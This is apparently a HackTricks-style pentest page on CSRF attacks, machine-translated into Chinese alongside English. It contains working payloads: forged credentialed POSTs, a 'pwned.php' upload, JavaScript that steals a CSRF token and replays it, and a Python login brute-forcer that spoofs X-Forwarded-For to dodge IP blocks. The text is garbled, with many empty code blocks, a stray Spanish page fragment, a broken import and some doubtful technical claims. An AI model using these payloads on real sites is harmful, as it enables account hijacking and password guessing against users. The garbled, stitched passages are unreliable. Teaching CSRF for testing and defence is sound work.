The URL you are requesting is no longer available
```
其他可以用于自动发送GET请求的HTML5标签有:
![](<../.gitbook/assets/image (530).png>)
### 表单GET请求
```markup
```
### 表单POST请求
A common method for submitting data to a web server is through a form POST request. This is typically used when a user fills out a form on a website and clicks the submit button. The form data is then sent to the server using the HTTP POST method.
一个常见的向Web服务器提交数据的方法是通过表单POST请求。当用户在网站上填写表单并点击提交按钮时,通常会使用这种方法。表单数据随后使用HTTP POST方法发送到服务器。
To perform a CSRF attack, an attacker can create a malicious webpage that includes a form with hidden fields. When a user visits this webpage, their browser will automatically submit the form to the target website, without the user's knowledge or consent.
为了进行CSRF攻击,攻击者可以创建一个恶意网页,其中包含一个带有隐藏字段的表单。当用户访问此网页时,他们的浏览器将自动将表单提交到目标网站,而用户并不知情或同意。
The hidden fields can contain values that the attacker wants to submit to the target website, such as changing the user's password or making a purchase on their behalf. Since the request is coming from the user's browser, the target website may mistakenly believe that the request is legitimate and process it accordingly.
隐藏字段可以包含攻击者想要提交到目标网站的值,例如更改用户的密码或代表用户进行购买。由于请求来自用户的浏览器,目标网站可能会错误地认为请求是合法的,并相应地处理它。
To protect against CSRF attacks, web developers can implement measures such as using anti-CSRF tokens, which are unique tokens generated for each user session. These tokens are included in the form and are validated by the server to ensure that the request is legitimate.
为了防止CSRF攻击,Web开发人员可以采取措施,例如使用反CSRF令牌,这些令牌是为每个用户会话生成的唯一令牌。这些令牌包含在表单中,并由服务器验证,以确保请求是合法的。
By validating the anti-CSRF token, the server can verify that the request originated from the same website and not from a malicious source. This helps prevent CSRF attacks by ensuring that only requests from trusted sources are processed.
通过验证反CSRF令牌,服务器可以验证请求是否来自同一网站,而不是来自恶意来源。这有助于通过确保仅处理来自可信源的请求来防止CSRF攻击。
```markup
```
### 通过iframe进行表单POST请求
In some cases, attackers can exploit Cross-Site Request Forgery (CSRF) vulnerabilities by using iframes to perform form POST requests. This technique is commonly known as "iframe-based CSRF" or "CSRF through iframes".
在某些情况下,攻击者可以利用iframe来执行表单POST请求,从而利用跨站请求伪造(CSRF)漏洞。这种技术通常被称为“基于iframe的CSRF”或“通过iframe的CSRF”。
Attackers can create a hidden iframe on a malicious website that loads a target website's form. The attacker then fills in the form fields with malicious data and submits the form using JavaScript. Since the iframe is hidden, the user is unaware of the malicious activity.
攻击者可以在恶意网站上创建一个隐藏的iframe,加载目标网站的表单。然后,攻击者使用JavaScript填充表单字段,并提交表单。由于iframe是隐藏的,用户对恶意活动毫不知情。
When the form is submitted, the browser sends the POST request to the target website, including any session cookies associated with the target website. This allows the attacker to perform actions on behalf of the user without their consent.
当表单被提交时,浏览器会将POST请求发送到目标网站,并包含与目标网站相关的任何会话cookie。这使得攻击者可以在用户不知情的情况下代表用户执行操作。
To protect against iframe-based CSRF attacks, web developers should implement measures such as:
为了防止基于iframe的CSRF攻击,Web开发人员应该采取以下措施:
- Implementing CSRF tokens: Include a unique token in each form submission and verify it on the server-side to ensure that the request is legitimate.
- 实施CSRF令牌:在每个表单提交中包含一个唯一的令牌,并在服务器端进行验证,以确保请求是合法的。
- Implementing SameSite cookies: Set the SameSite attribute to "Strict" or "Lax" for cookies to restrict their usage in cross-site requests.
- 实施SameSite cookie:将SameSite属性设置为“Strict”或“Lax”,以限制cookie在跨站请求中的使用。
- Implementing CSRF protection frameworks: Utilize frameworks like Django's CSRF protection or OWASP's CSRFGuard to add an additional layer of security against CSRF attacks.
- 实施CSRF保护框架:使用像Django的CSRF保护或OWASP的CSRFGuard这样的框架,为防止CSRF攻击增加额外的安全层。
By implementing these measures, web developers can mitigate the risk of CSRF attacks through iframes and protect user data and privacy.
通过实施这些措施,Web开发人员可以减轻通过iframe进行的CSRF攻击的风险,保护用户的数据和隐私。
```markup
```
### **Ajax POST 请求**
Ajax 是一种用于在后台发送 HTTP 请求的技术。通过使用 Ajax,可以在不刷新整个页面的情况下,向服务器发送 POST 请求并接收响应。
在进行 CSRF 攻击时,攻击者可以利用受害者的身份发送恶意的 Ajax POST 请求。这种攻击方式被称为 CSRF(跨站请求伪造)。
攻击者可以通过在恶意网站上放置一个钓鱼表单,或者通过发送包含恶意代码的电子邮件,引诱受害者点击恶意链接。当受害者在登录状态下访问恶意网站或点击恶意链接时,浏览器会自动发送包含受害者身份验证凭据的 Ajax POST 请求。
为了防止 CSRF 攻击,开发人员应该实施适当的防御措施,如使用 CSRF 令牌、检查 Referer 头部等。
```markup
```
### multipart/form-data POST 请求
When a web application uses the `multipart/form-data` encoding type for a POST request, it means that the data being sent is in a format that allows for the transmission of binary and textual data together. This encoding type is commonly used when uploading files through a web form.
当一个 Web 应用程序使用 `multipart/form-data` 编码类型进行 POST 请求时,意味着发送的数据以一种允许二进制和文本数据一起传输的格式进行编码。这种编码类型通常在通过 Web 表单上传文件时使用。
In a `multipart/form-data` POST request, the data is divided into multiple parts, each with its own set of headers and a unique identifier. Each part contains a specific piece of data, such as a file or a form field value.
在 `multipart/form-data` POST 请求中,数据被分成多个部分,每个部分都有自己的头部和唯一标识符。每个部分包含特定的数据,例如文件或表单字段的值。
The request body starts with a boundary string, which is a unique identifier that separates the different parts of the request. Each part is then preceded by a set of headers that provide information about the data being sent.
请求体以边界字符串开始,该字符串是一个唯一标识符,用于分隔请求的不同部分。然后,每个部分前面都有一组头部,提供有关发送的数据的信息。
For example, a `multipart/form-data` POST request may include a part for a file upload, with the `Content-Disposition` header specifying the name of the file and the `Content-Type` header indicating the type of file being uploaded.
例如,`multipart/form-data` POST 请求可能包含一个用于文件上传的部分,其中 `Content-Disposition` 头部指定文件的名称,而 `Content-Type` 头部指示正在上传的文件类型。
When performing a penetration test, it is important to understand how the web application handles `multipart/form-data` requests, as this can help identify potential vulnerabilities such as Cross-Site Request Forgery (CSRF).
在进行渗透测试时,了解 Web 应用程序如何处理 `multipart/form-data` 请求非常重要,因为这可以帮助识别潜在的漏洞,如跨站请求伪造(CSRF)。
By crafting malicious `multipart/form-data` requests, an attacker may be able to trick a user into unknowingly performing actions on the web application, leading to unauthorized access or data manipulation.
通过构造恶意的 `multipart/form-data` 请求,攻击者可能会成功欺骗用户在不知情的情况下对 Web 应用程序执行操作,从而导致未经授权的访问或数据篡改。
```javascript
myFormData = new FormData();
var blob = new Blob([""], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});
```
### multipart/form-data POST请求 v2
In this section, we will discuss the second version of the multipart/form-data POST request. This type of request is commonly used to upload files or submit form data that includes binary content.
#### Understanding the Request
The multipart/form-data POST request consists of multiple parts, each containing a separate piece of data. Each part is identified by a unique boundary string, which is specified in the request headers.
#### Building the Request
To build a multipart/form-data POST request, follow these steps:
1. Set the Content-Type header to "multipart/form-data" and include the boundary string.
2. Create each part of the request by specifying the Content-Disposition header, which includes the name and filename (if applicable) of the data being sent.
3. Include any additional headers required for each part, such as Content-Type for file uploads.
4. Add the data for each part, including any binary content.
5. Close the request body by adding the boundary string followed by "--" to indicate the end of the request.
#### Example Request
Here is an example of a multipart/form-data POST request:
```http
POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------1234567890
-----------------------------1234567890
Content-Disposition: form-data; name="username"
john.doe
-----------------------------1234567890
Content-Disposition: form-data; name="profile_picture"; filename="picture.jpg"
Content-Type: image/jpeg
[Binary image data]
-----------------------------1234567890--
```
In this example, the request includes two parts: one for the "username" field and another for the "profile_picture" file upload.
#### Conclusion
The multipart/form-data POST request is a versatile method for sending data that includes binary content. Understanding how to build and manipulate this type of request is essential for performing various web application attacks, such as CSRF (Cross-Site Request Forgery).
```javascript
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";
//xhr.send(body);
xhr.sendAsBinary(body);
```
### 在 iframe 中发送表单 POST 请求
When an HTML form is submitted, the browser sends a POST request to the server. This can be done within an iframe as well. However, due to the same-origin policy, the browser will only allow the form to be submitted if the form and the iframe have the same origin.
当 HTML 表单被提交时,浏览器会向服务器发送一个 POST 请求。这也可以在 iframe 中完成。然而,由于同源策略的限制,浏览器只允许在表单和 iframe 具有相同源的情况下提交表单。
To achieve this, you can create an iframe with the same origin as the form's target URL. Then, you can dynamically create a form within the iframe and submit it programmatically.
为了实现这一点,您可以创建一个与表单目标 URL 具有相同源的 iframe。然后,您可以在 iframe 中动态创建一个表单,并以编程方式提交它。
Here's an example of how you can accomplish this using JavaScript:
以下是使用 JavaScript 实现此功能的示例:
```html
```
In this example, an iframe with the id "myFrame" is created and its source is set to "https://example.com". Then, a form is dynamically created within the iframe and populated with hidden input fields. Finally, the form is submitted programmatically.
在这个示例中,创建了一个 id 为 "myFrame" 的 iframe,并将其源设置为 "https://example.com"。然后,在 iframe 中动态创建一个表单,并填充隐藏的输入字段。最后,以编程方式提交表单。
This technique can be used for various purposes, including performing Cross-Site Request Forgery (CSRF) attacks. It is important to note that CSRF attacks are illegal and unethical unless performed with proper authorization and for legitimate security testing purposes.
这种技术可以用于各种目的,包括执行跨站请求伪造(CSRF)攻击。需要注意的是,除非经过适当授权并用于合法的安全测试目的,否则执行 CSRF 攻击是非法和不道德的。
```markup
<--! expl.html -->
Sitio bajo mantenimiento. Disculpe las molestias
```
### **窃取CSRF令牌并发送POST请求**
In this technique, we will steal the CSRF token from a legitimate user and use it to craft a malicious POST request. This attack is known as Cross-Site Request Forgery (CSRF).
在这个技术中,我们将窃取合法用户的CSRF令牌,并使用它来构造恶意的POST请求。这种攻击被称为跨站请求伪造(CSRF)。
1. **Identify the target**: First, we need to identify the target website that is vulnerable to CSRF attacks.
**识别目标**:首先,我们需要识别易受CSRF攻击的目标网站。
2. **Analyze the website**: Next, we analyze the website to find out how the CSRF token is generated and included in the requests.
**分析网站**:接下来,我们分析网站,找出CSRF令牌是如何生成并包含在请求中的。
3. **Steal the CSRF token**: We can steal the CSRF token by tricking a legitimate user into visiting a malicious website or by exploiting a vulnerability on the target website.
**窃取CSRF令牌**:我们可以通过诱使合法用户访问恶意网站或利用目标网站上的漏洞来窃取CSRF令牌。
4. **Craft a malicious POST request**: Once we have the CSRF token, we can craft a malicious POST request with the stolen token and send it to the target website.
**构造恶意的POST请求**:一旦我们获得了CSRF令牌,我们可以使用窃取的令牌构造一个恶意的POST请求,并将其发送到目标网站。
5. **Exploit the vulnerability**: If the target website does not have proper CSRF protection in place, it will process the malicious POST request and perform the desired action on behalf of the legitimate user.
**利用漏洞**:如果目标网站没有适当的CSRF保护措施,它将处理恶意的POST请求,并代表合法用户执行所需的操作。
It is important to note that CSRF attacks can have serious consequences, such as unauthorized actions performed on behalf of the user or data leakage. Therefore, it is crucial for web developers to implement proper CSRF protection mechanisms to prevent such attacks.
需要注意的是,CSRF攻击可能会产生严重后果,例如以用户名义执行未经授权的操作或数据泄露。因此,对于Web开发人员来说,实施适当的CSRF保护机制以防止此类攻击至关重要。
```javascript
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}
xhr.send("token=" + token + "&otherparama=heyyyy");
}
function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}
var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
### **窃取CSRF令牌并使用iframe、表单和Ajax发送Post请求**
In this technique, we will exploit the vulnerability of Cross-Site Request Forgery (CSRF) by stealing the CSRF token and using it to send a malicious POST request. We will accomplish this by utilizing an iframe, a form, and Ajax.
在这个技术中,我们将利用跨站请求伪造(CSRF)的漏洞,窃取CSRF令牌并使用它发送恶意的POST请求。我们将通过使用iframe、表单和Ajax来实现这一目标。
#### **Step 1: Stealing the CSRF Token**
#### **步骤1:窃取CSRF令牌**
To begin, we need to find a way to steal the CSRF token from the target website. This can be done by analyzing the website's source code or using browser developer tools. Once we have identified the location of the CSRF token, we can extract it using JavaScript.
首先,我们需要找到一种方法来窃取目标网站的CSRF令牌。这可以通过分析网站的源代码或使用浏览器开发者工具来完成。一旦我们确定了CSRF令牌的位置,我们就可以使用JavaScript来提取它。
#### **Step 2: Creating an iframe**
#### **步骤2:创建一个iframe**
Next, we will create an iframe element in our malicious webpage. This iframe will be used to load the target website's page that contains the form we want to submit. By loading the target website within our iframe, we can manipulate the form and submit it without the user's knowledge.
接下来,我们将在恶意网页中创建一个iframe元素。这个iframe将用于加载包含我们想要提交的表单的目标网站页面。通过在我们的iframe中加载目标网站,我们可以在用户不知情的情况下操纵表单并提交它。
#### **Step 3: Manipulating the form**
#### **步骤3:操纵表单**
Once the target website's page is loaded within our iframe, we can use JavaScript to manipulate the form. We will set the form's action attribute to the URL where we want to send the malicious POST request. We will also set the form's method attribute to "POST" and include any necessary input fields with their corresponding values.
一旦目标网站的页面在我们的iframe中加载完成,我们就可以使用JavaScript来操纵表单。我们将把表单的action属性设置为我们想要发送恶意POST请求的URL。我们还将把表单的method属性设置为“POST”,并包含任何必要的输入字段及其相应的值。
#### **Step 4: Sending the POST request**
#### **步骤4:发送POST请求**
Finally, we will use Ajax to send the manipulated form data as a POST request to the target website's server. By doing this, we can bypass any CSRF protection mechanisms that may be in place. The server will process the request as if it came from a legitimate source, allowing us to perform unauthorized actions on behalf of the user.
最后,我们将使用Ajax将操纵后的表单数据作为POST请求发送到目标网站的服务器。通过这样做,我们可以绕过可能存在的任何CSRF保护机制。服务器将处理该请求,就好像它来自一个合法的来源,使我们能够代表用户执行未经授权的操作。
It is important to note that this technique is highly unethical and illegal unless performed with proper authorization during a penetration testing engagement.
需要注意的是,除非在渗透测试过程中经过适当授权,否则这种技术是非常不道德和非法的。
```markup
```
### **窃取CSRF令牌并使用iframe和表单发送POST请求**
To perform a Cross-Site Request Forgery (CSRF) attack, you need to steal the CSRF token from the target website and then use it to send a malicious POST request. One way to achieve this is by utilizing an iframe and a form.
首先,你需要从目标网站窃取CSRF令牌,然后使用它发送恶意的POST请求来执行跨站请求伪造(CSRF)攻击。其中一种方法是利用iframe和表单。
1. Create an iframe element in your attacker-controlled website. Set the source of the iframe to the target website's page that contains the CSRF token.
在攻击者控制的网站中创建一个iframe元素。将iframe的源设置为包含CSRF令牌的目标网站页面。
```html
```
2. Use JavaScript to access the content of the iframe and extract the CSRF token.
使用JavaScript访问iframe的内容并提取CSRF令牌。
```javascript
var iframe = document.getElementsByTagName('iframe')[0];
var csrfToken = iframe.contentDocument.getElementById('csrf-token').value;
```
3. Create a hidden form element in your attacker-controlled website. Set the action attribute of the form to the target website's vulnerable endpoint.
在攻击者控制的网站中创建一个隐藏的表单元素。将表单的action属性设置为目标网站的易受攻击的端点。
```html
```
4. Use JavaScript to set the value of the hidden input field to the stolen CSRF token.
使用JavaScript将隐藏输入字段的值设置为窃取的CSRF令牌。
```javascript
var form = document.getElementById('csrf-form');
form.elements['csrf-token'].value = csrfToken;
```
5. Use JavaScript to submit the form automatically.
使用JavaScript自动提交表单。
```javascript
form.submit();
```
By combining the iframe and form techniques, you can steal the CSRF token and send a POST request on behalf of the victim user without their knowledge or consent.
通过结合iframe和表单技术,你可以在用户不知情或未经同意的情况下窃取CSRF令牌并代表受害者用户发送POST请求。
```markup
```
### **窃取令牌并使用2个iframe发送**
In this technique, we will steal the CSRF token from the target website and send it to our own server using two iframes. This allows us to bypass the same-origin policy and perform unauthorized actions on behalf of the victim user.
#### **Step 1: Stealing the CSRF token**
To steal the CSRF token, we need to trick the victim into visiting a malicious website controlled by us. This can be done through various methods, such as sending a phishing email or exploiting a vulnerability in the target website.
Once the victim visits our malicious website, we can use JavaScript to extract the CSRF token from the target website's HTML source code. We can then store this token in a variable for later use.
#### **Step 2: Sending the stolen token**
Now that we have the stolen CSRF token, we can send it to our own server using two iframes. The first iframe will be used to make a GET request to the target website's endpoint that requires the CSRF token. We will include the stolen token as a parameter in the URL.
```html
```
The second iframe will be used to make a POST request to the same endpoint, this time including the stolen token in the request body.
```html
```
By using two iframes, we ensure that both the GET and POST requests are made, allowing us to successfully perform the CSRF attack.
#### **Step 3: Performing unauthorized actions**
Once the stolen token is sent to our server, we can use it to perform unauthorized actions on behalf of the victim user. This can include changing account settings, making purchases, or performing any other action that the victim user is authorized to do.
It is important to note that this technique relies on the victim being authenticated on the target website. If the victim is not logged in, the CSRF token will not be valid and the attack will fail.
By using this technique, an attacker can exploit CSRF vulnerabilities to gain unauthorized access to user accounts and perform malicious actions. It is important for developers to implement proper CSRF protection mechanisms to prevent such attacks.
```markup
```
### **使用Ajax窃取CSRF令牌并通过表单发送POST请求**
To perform a Cross-Site Request Forgery (CSRF) attack, you can use Ajax to steal the CSRF token and then send a POST request using a form.
要执行跨站请求伪造(CSRF)攻击,可以使用Ajax来窃取CSRF令牌,然后使用表单发送POST请求。
```javascript
```
The above code demonstrates how to steal the CSRF token using Ajax and then send a POST request with the stolen token.
上述代码演示了如何使用Ajax窃取CSRF令牌,然后使用窃取的令牌发送POST请求。
```markup
```
### 使用 Socket.IO 进行 CSRF 攻击
Cross-Site Request Forgery(跨站请求伪造,CSRF)是一种利用受害者在已经通过身份验证的网站上执行非预期操作的攻击方式。在这种攻击中,攻击者通过欺骗受害者执行恶意请求,从而利用受害者的身份进行非法操作。
Socket.IO 是一个用于实时应用程序的 JavaScript 库,它允许服务器和客户端之间进行双向通信。由于 Socket.IO 的特性,攻击者可以利用它来执行 CSRF 攻击。
以下是使用 Socket.IO 进行 CSRF 攻击的步骤:
1. 攻击者创建一个恶意网站,并在其中插入恶意代码。
2. 受害者在已经通过身份验证的网站上登录。
3. 受害者访问恶意网站,恶意代码会向已经通过身份验证的网站发送 CSRF 请求。
4. 由于受害者已经通过身份验证,服务器会认为这是一个合法的请求,并执行相应的操作。
5. 攻击者成功利用 CSRF 攻击,执行了非预期的操作。
为了防止 CSRF 攻击,开发人员可以采取以下措施:
- 实施 CSRF 令牌:在每个表单或请求中包含一个唯一的令牌,用于验证请求的合法性。
- 检查 Referer 头:服务器可以检查请求的 Referer 头,确保请求来自预期的来源。
- 使用 SameSite Cookie 属性:将 Cookie 的 SameSite 属性设置为 Strict 或 Lax,以限制 Cookie 的跨站传递。
通过了解 CSRF 攻击的原理和采取相应的防护措施,开发人员可以有效地保护他们的应用程序免受此类攻击的威胁。
```markup
```
## CSRF登录暴力破解
该代码可以使用CSRF令牌对登录表单进行暴力破解(还使用了X-Forwarded-For头部来尝试绕过可能的IP黑名单):
```python
import request
import re
import random
URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"
def init_session():
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie
def login(user, password):
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True
with open(PASS_LIST, "r") as f:
for line in f:
login(USER, line.strip())
```
## 工具
* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)
## 参考资料
* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)
**HackenProof 是所有加密货币赏金的家园。**
**即时获得奖励**\
HackenProof 的赏金只有在客户存入奖励预算后才会启动。在漏洞验证后,您将获得奖励。
**在 web3 渗透测试中积累经验**\
区块链协议和智能合约是新的互联网!掌握 web3 安全的崛起之日。
**成为 web3 黑客传奇**\
每次验证的漏洞都会获得声誉积分,并登上每周排行榜的榜首。
[**在 HackenProof 上注册**](https://hackenproof.com/register) 开始从您的黑客攻击中获利!
{% embed url="https://hackenproof.com/register" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
* 您在**网络安全公司**工作吗?您想在 HackTricks 中看到您的**公司广告**吗?或者您想获得最新版本的 PEASS 或下载 PDF 格式的 HackTricks 吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或在 **Twitter** 上 **关注**我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享您的黑客技巧。**